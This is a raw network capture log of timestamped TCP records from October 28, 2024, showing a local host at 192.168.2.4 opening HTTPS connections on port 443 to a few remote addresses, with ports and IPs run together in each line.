                                                                            Oct 28, 2024 09:37:20.182070971 CET49905443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:20.182085991 CET4434990513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:20.183890104 CET49911443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:20.183933020 CET4434991113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:20.184005976 CET49911443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:20.184108019 CET49911443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:20.184148073 CET4434991113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:20.189080000 CET4434989813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:20.189285040 CET4434989813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:20.189357996 CET49898443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:20.189439058 CET49898443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:20.189439058 CET49898443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:20.189481020 CET4434989813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:20.189511061 CET4434989813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:20.191437960 CET49912443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:20.191520929 CET4434991213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:20.191860914 CET49912443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:20.191860914 CET49912443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:20.191984892 CET4434991213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:20.242623091 CET4434990735.190.80.1192.168.2.4
                                                                            Oct 28, 2024 09:37:20.242861032 CET49907443192.168.2.435.190.80.1
                                                                            Oct 28, 2024 09:37:20.242880106 CET4434990735.190.80.1192.168.2.4
                                                                            Oct 28, 2024 09:37:20.243769884 CET4434990735.190.80.1192.168.2.4
                                                                            Oct 28, 2024 09:37:20.243834019 CET49907443192.168.2.435.190.80.1
                                                                            Oct 28, 2024 09:37:20.244159937 CET49907443192.168.2.435.190.80.1
                                                                            Oct 28, 2024 09:37:20.244215012 CET4434990735.190.80.1192.168.2.4
                                                                            Oct 28, 2024 09:37:20.244290113 CET49907443192.168.2.435.190.80.1
                                                                            Oct 28, 2024 09:37:20.284606934 CET49907443192.168.2.435.190.80.1
                                                                            Oct 28, 2024 09:37:20.284620047 CET4434990735.190.80.1192.168.2.4
                                                                            Oct 28, 2024 09:37:20.331465960 CET49907443192.168.2.435.190.80.1
                                                                            Oct 28, 2024 09:37:20.390408039 CET4434990735.190.80.1192.168.2.4
                                                                            Oct 28, 2024 09:37:20.390669107 CET49907443192.168.2.435.190.80.1
                                                                            Oct 28, 2024 09:37:20.390707970 CET4434990735.190.80.1192.168.2.4
                                                                            Oct 28, 2024 09:37:20.390779018 CET49907443192.168.2.435.190.80.1
                                                                            Oct 28, 2024 09:37:20.391179085 CET49913443192.168.2.435.190.80.1
                                                                            Oct 28, 2024 09:37:20.391208887 CET4434991335.190.80.1192.168.2.4
                                                                            Oct 28, 2024 09:37:20.391288042 CET49913443192.168.2.435.190.80.1
                                                                            Oct 28, 2024 09:37:20.391475916 CET49913443192.168.2.435.190.80.1
                                                                            Oct 28, 2024 09:37:20.391488075 CET4434991335.190.80.1192.168.2.4
                                                                            Oct 28, 2024 09:37:20.918369055 CET4434990913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:20.919107914 CET4434991113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:20.919162035 CET49909443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:20.919181108 CET4434990913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:20.919286966 CET49909443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:20.919292927 CET4434990913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:20.919718981 CET49911443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:20.919727087 CET4434991113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:20.920046091 CET49911443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:20.920051098 CET4434991113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:20.922847033 CET4434991013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:20.923276901 CET49910443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:20.923295021 CET4434991013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:20.923491955 CET49910443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:20.923506975 CET4434991013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:20.926584005 CET4434991213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:20.926913023 CET49912443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:20.926943064 CET4434991213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:20.927295923 CET49912443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:20.927301884 CET4434991213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:20.948787928 CET4434990813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:20.949433088 CET49908443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:20.949433088 CET49908443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:20.949451923 CET4434990813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:20.949461937 CET4434990813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.025654078 CET4434990913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.025733948 CET4434991013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.025794983 CET4434990913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.025809050 CET4434991113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.025815010 CET4434991013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.025881052 CET4434991113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.025913000 CET49910443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.025918961 CET49909443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.025975943 CET49911443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.025993109 CET4434991113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.026020050 CET4434991113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.026020050 CET4434991213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.026048899 CET49910443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.026071072 CET4434991013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.026071072 CET49911443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.026088953 CET49910443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.026098013 CET4434991013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.026247025 CET44349857142.250.186.164192.168.2.4
                                                                            Oct 28, 2024 09:37:22.026319027 CET4434990813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.026345968 CET44349857142.250.186.164192.168.2.4
                                                                            Oct 28, 2024 09:37:22.026371956 CET4434991213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.026421070 CET49857443192.168.2.4142.250.186.164
                                                                            Oct 28, 2024 09:37:22.026532888 CET49912443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.026598930 CET4434990813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.026606083 CET49911443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.026607037 CET49911443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.026674986 CET4434991113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.026698112 CET49908443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.026706934 CET4434991335.190.80.1192.168.2.4
                                                                            Oct 28, 2024 09:37:22.026710987 CET4434991113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.027225971 CET49912443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.027266979 CET4434991213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.027307987 CET49912443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.027342081 CET4434991213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.027539015 CET49908443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.027539015 CET49908443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.027556896 CET4434990813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.027566910 CET4434990813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.027647972 CET49909443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.027648926 CET49909443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.027714014 CET4434990913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.027749062 CET4434990913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.029721022 CET49913443192.168.2.435.190.80.1
                                                                            Oct 28, 2024 09:37:22.029731035 CET4434991335.190.80.1192.168.2.4
                                                                            Oct 28, 2024 09:37:22.030365944 CET49914443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.030410051 CET4434991413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.030514956 CET49915443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.030597925 CET4434991513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.030622959 CET4434991335.190.80.1192.168.2.4
                                                                            Oct 28, 2024 09:37:22.030711889 CET49914443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.030714989 CET49915443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.030855894 CET49913443192.168.2.435.190.80.1
                                                                            Oct 28, 2024 09:37:22.031267881 CET49916443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.031300068 CET4434991613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.031394005 CET49916443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.031413078 CET49917443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.031495094 CET4434991713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.031620979 CET49914443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.031651020 CET4434991413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.031651020 CET49917443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.031738043 CET49917443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.031768084 CET4434991713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.031794071 CET49915443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.031841993 CET49916443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.031856060 CET4434991613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.031867981 CET4434991513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.032223940 CET49913443192.168.2.435.190.80.1
                                                                            Oct 28, 2024 09:37:22.032321930 CET49913443192.168.2.435.190.80.1
                                                                            Oct 28, 2024 09:37:22.032322884 CET4434991335.190.80.1192.168.2.4
                                                                            Oct 28, 2024 09:37:22.032573938 CET49918443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.032581091 CET4434991813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.032727003 CET49918443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.032727003 CET49918443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.032746077 CET4434991813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.075325966 CET4434991335.190.80.1192.168.2.4
                                                                            Oct 28, 2024 09:37:22.081563950 CET49913443192.168.2.435.190.80.1
                                                                            Oct 28, 2024 09:37:22.081572056 CET4434991335.190.80.1192.168.2.4
                                                                            Oct 28, 2024 09:37:22.128360987 CET49913443192.168.2.435.190.80.1
                                                                            Oct 28, 2024 09:37:22.177110910 CET4434991335.190.80.1192.168.2.4
                                                                            Oct 28, 2024 09:37:22.177515030 CET49913443192.168.2.435.190.80.1
                                                                            Oct 28, 2024 09:37:22.177547932 CET4434991335.190.80.1192.168.2.4
                                                                            Oct 28, 2024 09:37:22.177632093 CET49913443192.168.2.435.190.80.1
                                                                            Oct 28, 2024 09:37:22.764260054 CET4434991613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.765162945 CET49916443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.765162945 CET49916443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.765182972 CET4434991613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.765198946 CET4434991613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.772527933 CET4434991813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.773046017 CET49918443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.773060083 CET4434991813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.773511887 CET49918443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.773515940 CET4434991813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.774348974 CET4434991713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.775121927 CET49917443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.775121927 CET49917443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.775193930 CET4434991713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.775226116 CET4434991713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.777057886 CET4434991413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.778103113 CET49914443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.778136015 CET4434991413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.781316996 CET49914443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.781322002 CET4434991413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.810419083 CET4434991513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.811269045 CET49915443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.811269999 CET49915443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.811352968 CET4434991513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.811384916 CET4434991513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.895593882 CET4434991613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.895709038 CET4434991613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.895836115 CET49916443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.895862103 CET49916443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.895862103 CET49916443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.895879984 CET4434991613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.895889044 CET4434991613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.898338079 CET49919443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.898418903 CET4434991913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.898540020 CET49919443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.898737907 CET49919443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.898760080 CET4434991913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.900557041 CET4434991813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.900629044 CET4434991813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.900733948 CET4434991813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.900841951 CET49918443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.900885105 CET49918443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.900885105 CET49918443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.900891066 CET4434991813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.900897026 CET4434991813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.904216051 CET4434991713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.904273033 CET49920443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.904284000 CET4434991713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.904320002 CET4434992013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.904391050 CET49920443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.904403925 CET49917443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.904434919 CET4434991713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.904472113 CET4434991713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.904546022 CET49917443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.904627085 CET49917443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.904627085 CET49917443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.904656887 CET4434991713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.904680967 CET4434991713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.905484915 CET49920443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.905519962 CET4434992013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.908379078 CET4434991413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.908535004 CET4434991413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.908615112 CET49921443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.908729076 CET4434992113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.908739090 CET49914443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.908739090 CET49914443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.908768892 CET49914443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.908783913 CET4434991413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.908828020 CET49921443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.909172058 CET49921443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.909250021 CET4434992113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.910595894 CET49922443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.910629034 CET4434992213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.910693884 CET49922443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.910808086 CET49922443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.910819054 CET4434992213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.952151060 CET4434991513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.952300072 CET4434991513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.952445984 CET49915443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.952445984 CET49915443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.952692986 CET49915443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.952729940 CET4434991513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.954323053 CET49923443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.954380035 CET4434992313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:22.954476118 CET49923443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.954571009 CET49923443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:22.954588890 CET4434992313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:23.520445108 CET49857443192.168.2.4142.250.186.164
                                                                            Oct 28, 2024 09:37:23.520543098 CET44349857142.250.186.164192.168.2.4
                                                                            Oct 28, 2024 09:37:23.758799076 CET4434992113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:23.758804083 CET4434992313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:23.759002924 CET4434992013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:23.759255886 CET49921443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:23.759255886 CET49923443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:23.759274006 CET4434992113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:23.759298086 CET4434992313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:23.759453058 CET4434991913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:23.759565115 CET4434992213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:23.759704113 CET49923443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:23.759711981 CET4434992313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:23.759881020 CET49921443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:23.759886026 CET4434992113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:23.759886980 CET49922443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:23.759924889 CET4434992213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:23.760190964 CET49922443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:23.760194063 CET49919443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:23.760196924 CET4434992213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:23.760229111 CET4434991913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:23.760461092 CET49920443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:23.760468960 CET4434992013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:23.760569096 CET49919443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:23.760595083 CET4434991913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:23.760767937 CET49920443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:23.760773897 CET4434992013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:23.887882948 CET4434992113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:23.888029099 CET4434992113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:23.888331890 CET49921443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:23.888331890 CET49921443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:23.888331890 CET49921443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:23.890549898 CET4434992013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:23.890620947 CET4434992013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:23.890788078 CET49924443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:23.890805960 CET49920443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:23.890830040 CET4434992413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:23.890856028 CET49920443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:23.890872002 CET4434992013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:23.890922070 CET49924443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:23.890988111 CET4434992313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:23.891004086 CET49924443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:23.891012907 CET4434992413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:23.891583920 CET4434992313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:23.891688108 CET49923443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:23.891715050 CET49923443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:23.891727924 CET4434992313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:23.891741991 CET49923443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:23.891748905 CET4434992313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:23.892138958 CET4434991913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:23.892311096 CET4434991913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:23.892537117 CET49919443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:23.893445015 CET4434992213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:23.893529892 CET4434992213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:23.893589020 CET49922443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:23.893600941 CET4434992213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:23.893666983 CET49919443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:23.893666983 CET49919443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:23.893701077 CET4434991913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:23.893726110 CET4434991913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:23.893759966 CET4434992213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:23.893856049 CET49922443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:23.894448996 CET49922443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:23.894454956 CET4434992213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:23.894525051 CET49922443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:23.894531965 CET4434992213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:23.895881891 CET49925443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:23.895910978 CET4434992513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:23.895999908 CET49925443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:23.896193981 CET49926443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:23.896208048 CET4434992613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:23.896365881 CET49926443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:23.896917105 CET49927443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:23.896927118 CET4434992713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:23.896940947 CET49925443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:23.896965027 CET4434992513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:23.896990061 CET49927443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:23.897142887 CET49926443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:23.897156954 CET4434992613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:23.897223949 CET49927443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:23.897236109 CET4434992713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:23.898189068 CET49928443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:23.898268938 CET4434992813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:23.898374081 CET49928443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:23.898514986 CET49928443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:23.898550987 CET4434992813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:24.112087965 CET49921443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:24.112142086 CET4434992113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:24.626377106 CET4434992713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:24.626843929 CET49927443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:24.626903057 CET4434992713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:24.627212048 CET49927443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:24.627224922 CET4434992713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:24.631506920 CET4434992613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:24.631978989 CET49926443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:24.631999969 CET4434992613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:24.632260084 CET49926443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:24.632266998 CET4434992613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:24.633552074 CET4434992813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:24.633927107 CET49928443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:24.633961916 CET4434992813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:24.634248972 CET49928443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:24.634255886 CET4434992813.107.246.45192.168.2.4
